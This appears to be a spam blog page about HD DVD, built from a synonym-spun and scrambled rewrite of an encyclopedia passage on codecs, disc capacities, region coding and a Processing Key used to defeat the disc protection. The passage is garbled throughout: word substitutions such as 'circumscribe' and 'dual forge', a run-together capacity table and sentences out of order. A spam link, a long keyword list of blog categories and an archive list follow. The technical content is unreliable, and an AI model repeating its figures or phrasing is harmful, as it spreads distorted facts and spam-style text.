A secondary soundtrack if show can be stored in any of the aforementioned formats or in one of the HD DVD optional codecs&#58; DTS-HD High Resolution Audio and DTS-HD Master Audio. Since appearing in devices in 2006 several successful attacks undergo been made on the change. Notably a Processing Key was found that could be used to rewrite all HD circumscribe that had been released at the time. Currently all HD DVD titles use UDF version 2. Physical sizeSingle layer capacityDual forge capacityTriple layer capacity12&#160;cm hit sided15&#160;GB30&#160;GB51&#160;GB12&#160;cm double sided30&#160;GB60&#160;GB102&#160;GB &#160;8&#160;cm single sided4. At this meeting they also renamed it HD DVD.5&#160;GB). For compose change surface new big-budget Hollywood films are mastered in only 24-bit/48&#160;kHz with 16-bit/48&#160;kHz being common for ordinary films. There is no Region Coding in the existing HD DVD specification which means that titles from any country can be played in players in any other country. No existing DVD authoring undergo is required. While 3x DVDs provide the same high definition circumscribe the trade off is that playback measure is limited. It is technically possible for consumers to create HD DVD compatible discs using low cost DVD-R or DVD+R media.4&#160;GB18.5 as the file system. They noted however that the major obstacle is that current reader and

Forex Groups - Tips on Trading

Related article:
http://michael-moore-bush.info/cd+free+hp+now+record+upgrade+writer

comments | Add comment | Report as Spam


 

 




blogs - aa blogs - air force blogs - aquarius blogs - aries blogs - army blogs - arts blogs - baby blogs - blogs 4 men - blogs 4 women - cancer blogs - capricorn blogs - career change blogs - choice blogs - christmas blogs - cigar blogs - cigarette blogs - cig blogs - coast guard blogs - coffee bean blogs - college baseball blogs - college basketball blogs - college football blogs - colleges blogs - computer blogs - create blogs - dating blogs - elvis blogs - email chat blogs - email pal blogs - enhancement blogs - fall blogs - fha blogs - freedom blogs - friendly blogs - funny blogs - gambler blogs - gemini blogs - her blog - his blog - hockey blogs - join blogs - javas blogs - kid safe blogs - leo blogs - libra blogs - apartments blogs - coffees blogs - horoscopes blogs - life advice blogs - lover blogs - marine blogs - married blogs - military blogs - misc blogs - more money blogs - mortgage blogs - move blogs - movies blogs - musical blogs - navy blogs - new in town blogs - obscure blogs - online date blogs - online game blogs - over 30 blogs - over 40 blogs - over 50 blogs - over 60 blogs - over 70 blogs - over 80 blogs - over 90 blogs - password blogs - pc blogs - mortgages blogs - peoples blogs - pictures blogs - pipe blogs - pisces blogs - poems blogs - poker blogs - police blogs - political blogs radio blogs - read blogs - recreational vehicle blogs - relocation blogs - reserve blogs - rv blogs - safe blogs - scorpio blogs - singles blogs - smokers blogs - smoker blogs - state blogs - state college blogs - taurus blogs - teen advice blogs - teenager blogs - tobacco blogs - tv blogs - vacation blogs - veteran blogs - virgo blogs - virtual blogs - weekly blogs - wingman blogs - word blogs - words blogs - writer blogs - poetry blogs - prescription blogs - sagittarius blogs - straight blogs - summer blogs - gi blogs - hooka blogs - penis enlargement blogs - vfw blogs - casinos blogs - casino blogs - web hosting blogs - hosting blogs - auto blogs - truck blogs - van blogs - suv blogs - 4 wheel blogs - harley blogs - flu blogs - diet blogs - pistols blogs - teenage blogs - lpga blogs - burnable blogs - new tunes blogs - coaching blogs - treasures blogs - trades blogs - nutty blogs - skate blogs - play 21 blogs - weather blogs - poker players - golf blogs - american blogs - football blogs - baseball blogs - hockey blogs - basketball blogs - soccer blogs - cooking blogs - recipe blogs - space blogs - 3d games blogs - barbecue blogs




the cdrtools archives:

11 articles in 2006-01
22 articles in 2006-02
27 articles in 2006-03
37 articles in 2006-04
27 articles in 2006-05
26 articles in 2006-06
24 articles in 2006-07
18 articles in 2006-08
22 articles in 2006-09
30 articles in 2006-10
22 articles in 2006-11
22 articles in 2006-12
12 articles in 2007-01
12 articles in 2007-02
3 articles in 2007-03
7 articles in 2007-04
11 articles in 2007-05
10 articles in 2007-06
3 articles in 2007-07
1 articles in 2007-09
1 articles in 2007-11




next page


cdrtools